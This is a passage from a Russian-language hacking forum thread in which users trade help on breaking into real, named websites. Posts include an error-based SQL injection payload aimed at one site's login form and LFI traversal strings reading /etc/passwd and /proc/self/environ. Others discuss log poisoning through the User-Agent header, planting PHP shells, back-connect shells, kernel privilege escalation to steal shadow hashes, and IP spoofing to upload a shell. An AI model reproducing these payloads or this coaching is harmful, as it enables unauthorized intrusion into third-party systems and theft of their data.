Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. JohnnnDoe

    JohnnnDoe New Member

    Joined:
    2 Nov 2012
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    madhatter, СУБД.
    сайт находится в локалке, так что от ссылки, к сожалению, не будет толку.
    Если представить, что запрос не фильтруется, то для какой СУБД характерно такое поведение?


    Ещё очень характерная особенность!
    срабатывает такой запрос:
    host.com/page.php?id=19' and 1<(select id)
    то есть можно выбрать колонку id без указания в запросе ключевого слова FROM и таблицы, из которой нужно делать запрос.

    Сам я пока думаю, что выполняется не простой запрос какая-нибудь хранимая процедура.
     
    #23161 JohnnnDoe, 13 Mar 2014
    Last edited: 13 Mar 2014
  2. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    565
    Likes Received:
    50
    Reputations:
    54
    Касательно select without from:
    http://www.firebirdfaq.org/faq30/

    Дабы не гадать по комментариям, можно опереться на другие признаки. Целевой хост по портам сканировали? select version() делали? Часто субд выбирают вместе с операционкой. Ос на цели какая? Скрипты, которые к субд обращаются самописные\платные\паблик? Какой интерпретатор, веб-сервер?

    В конце концов, можете попробовать зарядить скулю на софт, который может делать фингерпритинг субд. Тот же sqlmap это может, если не путаю.
     
  3. JohnnnDoe

    JohnnnDoe New Member

    Joined:
    2 Nov 2012
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    nmap определил как Linux. Но это ни о чём не говорит - скрипт на целевом хосте может легко коннектится к БД на другом сервере. Скрипты платные. PHP, Apache.
    Спасибо за подсказку про sqlmap.
    Но, судя по всему, это какая-то специфичная/малораспространённая в веб-проектах СУБД.
     
  4. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    565
    Likes Received:
    50
    Reputations:
    54
    Может, конечно, да редко бывает. Например, совсем не часто увидишь php+ubuntu+nginx+apache -> mssql.

    1) version(); ?
    2) sqlmap output?
    3) nmap -sV -p 0-65535 <target>?
    4) cms?

    Подозреваю, ответы на эти вопросы позволят однозначно идентифицировать вашу субд.
     
  5. JohnnnDoe

    JohnnnDoe New Member

    Joined:
    2 Nov 2012
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    madhatter, спасибо! твой совет реально помог! sqlmap нашёл вывод и определил СУБД - это postgresql.
     
  6. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    546
    Likes Received:
    159
    Reputations:
    324
    Немного странный вопрос:
    К примеру есть насайте LFI. Может ли быть такое что никак совсем ничего не сделать кроме как читать и инклудить файлы которые уже есть? Или настоящий про всегда найдет способ залить шелл?

    Подскажите ещё норм фаззер с хорошей базой для поиска файлов(php конфигов, логов nginx,etc)
     
    #23166 psihoz26, 14 Mar 2014
    Last edited: 14 Mar 2014
  7. Вrabus

    Вrabus Banned

    Joined:
    31 Jan 2014
    Messages:
    19
    Likes Received:
    4
    Reputations:
    -1
    как вариант- найти путь до логов сервера и послать ему пакет с php-кодом в User-Agent и потом проинклудить этот лог
     
  8. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    546
    Likes Received:
    159
    Reputations:
    324
    Нашел nginx.conf

    В нём записи

    Code:
    #error_log  logs/error.log;
    #error_log  logs/error.log  notice;
    #error_log  logs/error.log  info;
    
        #access_log  logs/access.log  main;
    Если это абсолютный путь то я вообще ничего не понимаю

    Code:
    ../../../../etc/passwd%00 
    -работает

    Code:
    ../../../../logs/error.log%00
    ../../../../logs/access.log%00
    -неработает

    Идём далие
    Code:
    ../../../../proc/self/environ%00
    - выдает мне всего одну строку причём всегда.

    Code:
    SSH_CLIENT=%ТУТ БЫЛ ЧЕЙТО IP% 49719 21012
     
  9. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    565
    Likes Received:
    50
    Reputations:
    54
    Как подсказывает шарп в начале строки, это комментарии в конфиге. К тому же, nginx как правило проксирует апач рядом, который тоже ведет логи. И собственно, в чем вопрос?
     
    1 person likes this.
  10. Rextor

    Rextor New Member

    Joined:
    26 Feb 2014
    Messages:
    40
    Likes Received:
    2
    Reputations:
    4
    Извиняюсь за наверно банальный и многократно заезженный вопрос. Я пробую гуглить его сам, но на тот случай, если уже есть что-то простое, был бы рад услышать.

    Все та же история с сервером. Если сократить ее, есть основной сервер, где я могу лишь читать открытые файлы, и есть тестовый (физически, они разные), где есть достаточно точная копия сайта с основного (нужных уязвимостей не удалось найти), и на этом сервере мне удалось залить php шелл, плюс на обоих серверах стоит webmin и есть основание предполагать, что у них есть общая пара логин/пароль без привязки по айпи (иными словами, предполагаю, что добыв лог/пасс с тестового, я смогу его задействовать на основном).

    Так вот, насколько я понял, webmin для авторизации использует данные из shadow файла, который прочесть из-под apache пользователя, под которым работает шелл, нельзя, но очень нужно. Что можно попробовать предпринять в данной ситуации, есть ли какие-нибудь эксплоиты для его чтения? Главная цель - залить шелл на основной сервер.
     
  11. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    546
    Likes Received:
    159
    Reputations:
    324
    надо поднимать права
     
  12. Rextor

    Rextor New Member

    Joined:
    26 Feb 2014
    Messages:
    40
    Likes Received:
    2
    Reputations:
    4
    Да, насчет поднятия прав логично, вопрос в способах поднятия прав (наверно стоило прямо спросить про поднятия, но оставил в общем виде на случай, если это не единственный способ прочесть рутовый файл). Есть ли что-то, на что стоит обратить внимание, что вероятно сработает?

    UPD: забыл уточнить. Само по себе линукс ядро на сервере достаточно старое (2.6.18), и эксплоитов, как я понял, на него достаточно много. Дилемма в том, что некоторые эксплоиты наверно не совместимы с php шеллом (т.е. я опасаюсь, что при попытке запустить эксплоит, шелл либо повиснет вместе с апачем, либо рут запустится отдельным процессом - такого рода). Всякий ли рабочий экплоит с повышением прав подойдет?

    UPD2: ок, я стормозил (верней, я не знал), в шелле можно через back-connect подключиться к серверу по терминалу, так что вопрос теперь лишь непосредственно в повышении привилегий любым эксплоитом.
     
    #23172 Rextor, 15 Mar 2014
    Last edited: 15 Mar 2014
  13. sav77

    sav77 Member

    Joined:
    20 Oct 2010
    Messages:
    54
    Likes Received:
    13
    Reputations:
    0
    Помогите раскрутить:
    Code:
    cafe.funizen[antigoogle]com/sub/customer/news.html?keyword=&ktype=&pageID=%5c
    или
    cafe.funizen[antigoogle]com/sub/customer/improvement_view.html?board_seq=\
     
    #23173 sav77, 15 Mar 2014
    Last edited: 15 Mar 2014
  14. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    POST
    http://cafe.funizen.com/sub/member/login_ok.html
    Code:
    m_id=%5c'or(select 1 from(select max(rand(0))from(information_schema.tables)group by concat(user(),version(),hex(rand(0))))aa)-- w&m_pwd=qwrqw
     
    2 people like this.
  15. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    есть форум phpbb 2, Восстановить БД - неработает, стили тоже, как еще можно залится?
     
    #23175 qaz, 17 Mar 2014
    Last edited: 17 Mar 2014
  16. krist11

    krist11 Member

    Joined:
    2 May 2012
    Messages:
    5
    Likes Received:
    12
    Reputations:
    10
    А если БД в ручном режиме залить по частям.
     
  17. AHTNkiller

    AHTNkiller New Member

    Joined:
    7 Sep 2011
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    Помогите доковырять
    http://forum-auto.ru/news.php?part=car&page_normal=2'
     
  18. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Инъекция в limit + присутствует в запросе order by = "доковырять" не получится
     
  19. ckbs

    ckbs New Member

    Joined:
    13 Mar 2014
    Messages:
    33
    Likes Received:
    0
    Reputations:
    0
    Code:
    http://www.demotywuje.pl/uzytkownik/Katri/strona/'17/
    :(
     
  20. Rextor

    Rextor New Member

    Joined:
    26 Feb 2014
    Messages:
    40
    Likes Received:
    2
    Reputations:
    4
    Такой вопрос - на админке сайта стоит фильтр по айпи, через .htaccess и в РНР коде. Прогуглив вопрос о попытках подмены айпи, народ как правило говорил, что айпи поменять конечно можно, но тогда и сервер будет слать ответ на поддельный айпи. Так вот, вопрос в том, возможно ли при таком раскладе, подменив айпи на подходящий, в одностороннем порядке отправить запрос на аплоад файла? Т.е. мне вобщем-то не нужен ответ от сервера, если он просто молча зальет к себе шелл, благо доступ к залитому файлу ничем не будет ограничен.

    Такой вариант возможен? Или из-за процедуры инициализации соединения, механики аплоада или чего-то подобного это нереально?
     
Loading...
Thread Status:
Not open for further replies.